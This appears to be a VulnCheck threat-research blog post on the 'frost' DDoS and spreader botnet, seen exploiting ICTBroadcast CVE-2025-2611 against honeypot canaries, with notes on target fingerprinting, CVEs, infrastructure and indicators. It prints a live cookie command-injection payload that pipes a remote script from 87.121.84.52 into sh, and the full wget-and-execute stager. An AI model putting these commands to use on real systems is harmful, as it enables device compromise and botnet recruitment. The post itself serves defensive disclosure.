About Frost

Starting on November 28, 2025 we began seeing new attacks on our ICTBroadcast CVE-2025-2611 canaries. The raw canary data looks like:

{
  "src_ip": "87.121.84.52",
  "src_port": 55590,
  "src_country": "NL",
  "dst_country": "US",
  "cve": "CVE-2025-2611",
  "signature_id": 12700629,
  "signature": "VULNCHECK ICTBroadcast CVE-2025-2611 Exploit Attempt",
  "category": "Web Application Attack",
  "severity": 1,
  "payload": "R0VUIC9sb2dpbi5waHAgSFRUUC8xLjANCkhvc3Q6IFZDX1JFREFDVEVEDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoWDExOyBMaW51eCB4ODZfNjQ7IHJ2OjE0MC4wKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzE0MC4wDQpDb29raWU6IEJST0FEQ0FTVD1gd2dldCR7SUZTfWh0dHA6Ly84Ny4xMjEuODQuNTIvbWlzYy5pY3Ricm9hZGNhc3Quc2gke0lGU30tTy18c2hgOyBpY3Ricm9hZGNhc3Q9YHdnZXQke0lGU31odHRwOi8vODcuMTIxLjg0LjUyL21pc2MuaWN0YnJvYWRjYXN0LnNoJHtJRlN9LU8tfHNoYA0KDQo=",
  "http": {
    "url": "/login.php",
    "http_user_agent": "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0",
    "protocol": "HTTP/1.0"
  },
  "timestamp": "2025-12-01T13:14:41.919Z"
}

Decoding the payload field reveals the attacker's exploit:

GET /login.php HTTP/1.0
Host: VC_REDACTED
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Cookie: BROADCAST=`wget${IFS}http://87.121.84.52/misc.ictbroadcast.sh${IFS}-O-|sh`; ictbroadcast=`wget${IFS}http://87.121.84.52/misc.ictbroadcast.sh${IFS}-O-|sh`

As we covered in our earlier write up, ICTBroadcast Command Injection Actively Exploited (CVE-2025-2611), exploitation runs through the Cookie field. Here the attacker pulls down a misc.ictbroadcast.sh script from the same host and executes it with sh. The script is the usual multi-architecture stager. The full script is shown below:

cd /tmp || cd /var/tmp || cd /var || cd /mnt || cd /dev || cd /
wget http://87.121.84.52/frost.armv7 -O- > wung; chmod 777 wung; ./wung misc.ictbroadcast; rm wung
wget http://87.121.84.52/frost.armv6 -O- > wung; chmod 777 wung; ./wung misc.ictbroadcast; rm wung
wget http://87.121.84.52/frost.armv5 -O- > wung; chmod 777 wung; ./wung misc.ictbroadcast; rm wung
wget http://87.121.84.52/frost.mips -O- > wung; chmod 777 wung; ./wung misc.ictbroadcast; rm wung
wget http://87.121.84.52/frost.mipsel -O- > wung; chmod 777 wung; ./wung misc.ictbroadcast; rm wung
wget http://87.121.84.52/frost.aarch64 -O- > wung; chmod 777 wung; ./wung misc.ictbroadcast; rm wung
wget http://87.121.84.52/frost.armv7b -O- > wung; chmod 777 wung; ./wung misc.ictbroadcast; rm wung
wget http://87.121.84.52/frost.x86 -O- > wung; chmod 777 wung; ./wung misc.ictbroadcast; rm wung
wget http://87.121.84.52/frost.x86_64 -O- > wung; chmod 777 wung; ./wung misc.ictbroadcast; rm wung
rm misc.ictbroadcast.sh

The attacker downloads several architecture-specific versions of a binary they name frost, runs each one in turn, deletes them, and then deletes the stager.

The frost binary combines DDoS tooling with spreader logic that includes fourteen exploits for fifteen CVEs. The important part is how it spreads. The operator is not carpet bombing the internet with exploits. `frost` checks the target first and only proceeds with exploitation when it sees the specific indicators it expects.

For example, frost will only exploit CVE-2025-1610 after first receiving an HTTP response to GET / that contains Set-Cookie: user=(null) and then a follow-on response to a second request that contains Set-Cookie: user=admin. If those markers are not there, it does nothing. If they are, it commits. This is the kind of selective behavior our canaries catch.

The table below shows how far this selectivity goes. Each exploit path has its own fingerprint checks, and frost will only run the exploit when those conditions match.

Some match conditions are very specific, such as CVE-2025-1610 and CVE-2017-18377, which requires the GoAhead-Webs banner and specific JavaScript content. Others are much looser. CVE-2022-40475, for example, only checks for a lighttpd server banner.

Each exploit works in a similar way. Successful exploitation downloads a stager script, and the stager retrieves the secondary binary (a DDoS and spreader tool, frost). The attacker has named each stager according to the exploited target. For example, CVE-2023-7311 uses router.bytevalue-rep.sh and CVE-2025-34132 uses dvr.lilin-rep.sh. All of them follow the same <host-type>.<vendor>-rep.sh naming pattern. Even the ICTBroadcast path follows this format with misc.ictbroadcast.sh.

The table below summarizes all fourteen stager names and their associated CVEs.

This naming scheme allows us to query honeypot datasets such as SANS Web Honeypot Data for related activity. As of this writing, none of the stager names appear in the SANS urlsummary.txt feed. This is consistent with the operator's behavior. The stagers are only delivered to targets that satisfy the match conditions, and some of our canaries fall into that category.

Beyond the stagers and match conditions, the vulnerability set itself is notable. Only four of the CVEs targeted by frost are included in the CISA Known Exploited Vulnerabilities catalog (CVE-2020-10987, CVE-2021-45382, CVE-2023-1389, and CVE-2024-12987). At the time of discovery, all but one appeared in the free VulnCheck KEV. The remaining CVE, CVE-2025-1610, is unusual because VulnCheck Exploit and Vulnerability Intelligence currently indexes only a single proof of concept for it, and that PoC is a Notion document. No Nuclei template or Metasploit module exists for it, yet the implementation in frost matches the Notion document precisely.

The corresponding implementation inside frost is shown in the disassembly below.

VulnCheck Exploit and Vulnerability Intelligence links the remaining CVEs to nineteen different botnets, including IZ1H9, Beastmode, RustoBot, RondoDox, Mirai, ShadowV2, AISURU, Moobot, Gitpaste-12, BotenaGo, Zerobot, Gayfemboy, Ballista, Skibidi, XoRBot, Androxgh0st, Condi, AGoent, and Gafgyt. In other words, this operator is not working new or unexplored ground. They are using the same vulnerabilities that many other botnets rely on. Most of these CVEs are also not in the CISA KEV, which highlights how much active exploitation activity occurs outside that list.

Our IP Intelligence data shows that the number of internet-exposed systems vulnerable to these bugs is small. Across the vulnerabilities we track, the global population is under ten thousand. This limits how large a botnet built on these CVEs can get, which makes this operator a relatively small player. It also highlights something interesting about this campaign. The frost binary does not contain the ICTBroadcast exploit that was used to deliver it in the first place, so the operator clearly has additional exploits in rotation that are not present in the sample. The table below breaks the population out by CVE.

With the victim side mapped out, we can look at the operator's footprint online.

The canary-observed activity originates from 87.121.84.52. This host is launching the exploitation attempts and also serves the stager scripts and the frost binaries over HTTP on port 80. Inside the binary we see references to three domains that resolve to this same IP: krebs.strangled.net, mreow.jumpingcrab.com, and xlab.ignorelist.com. Shodan shows the host exposing additional exploit related behavior on TCP port 2, which matches what we see in our canaries and strongly suggests that 87.121.84.52 is the operator's primary system.

We also saw a second host, 176.65.148.246, that may be related. Shodan shows that host also using the same 220 meow :3 banner seen on the primary host, giving it a loose connection to the same operator. That link is slightly strengthened by similar exploit behavior reported in AbuseIPDB.

Taken together, the evidence points to a small, targeted operation. The vulnerable population is small, as shown by our IP Intelligence data, and the strict match conditions inside frost allow the operator to avoid most honeypots. The CVEs themselves are well-known. VulnCheck Exploit & Vulnerability Intelligence associates them with numerous botnets, and while most do not appear in the CISA KEV, nearly all are included in the free VulnCheck KEV. Notably, the ICTBroadcast exploit that delivered this sample does not appear in the binary, which indicates the operator has additional capabilities not visible here. Our canaries revealed this activity because they emulate the expected behavior of real systems.

About VulnCheck

VulnCheck’s research team tracks real-world exploitation, attacker infrastructure, and exploit workflows using our Canary Intelligence, Exploit & Vulnerability Intelligence (EVI), and IP Intelligence datasets. The analysis in this blog draws directly on those capabilities: Canary Intelligence surfaced the selective exploitation behavior, EVI linked the CVEs to known botnets, and IP Intelligence identified the actual population of exposed hosts.

For more research like this check out our blogs, The Mystery OAST Host Behind a Regionally Focused Exploit Operation, XWiki Under Increased Attack and ICTBroadcast Command Injection Actively Exploited (CVE-2025-2611).

Sign up for the VulnCheck community today to get free access to our VulnCheck KEV, enjoy our comprehensive vulnerability data, and request a trial of our Initial Access Intelligence, IP Intelligence, Canary Intelligence, and Exploit & Vulnerability Intelligence products.

Indicators

IP Addresses:

• 87.121.84.52 - Scanning, exploitation, and hosting
• 176.65.148.246 - Potentially related scanning

Domains:

• krebs.strangled.net
• mreow.jumpingcrab.com
• xlab.ignorelist.com

Hashes (SHA-1)

• frost.armv7: 6e61651d0e2e3d13f769e05659cc2613f9a3a52a
• frost.armv6: c467e605b4c7c4a6a9aedda2cee63f6fa501e9cc
• frost.armv5: cb112935934a8b32459adccab119391df480c75e
• frost.mips: a7957d96f4d8c5e801106281e85afd889d369850
• frost.mipsel: e6f9789322a55f721b8e8a21812912e0a3de6703
• frost.aarch64: 712d90530ad71f344199db3a0a9bea696db5cfae
• frost.armv7b: d0725253dc39a57049ea48e2a8c9316b7ee5159e
• frost.x86: f0b6bdb895918e5b27eef96f4c77f11351875028
• frost.x86_64: b7b79f6b41b2cde4dad8a8b7269eea5e11d43751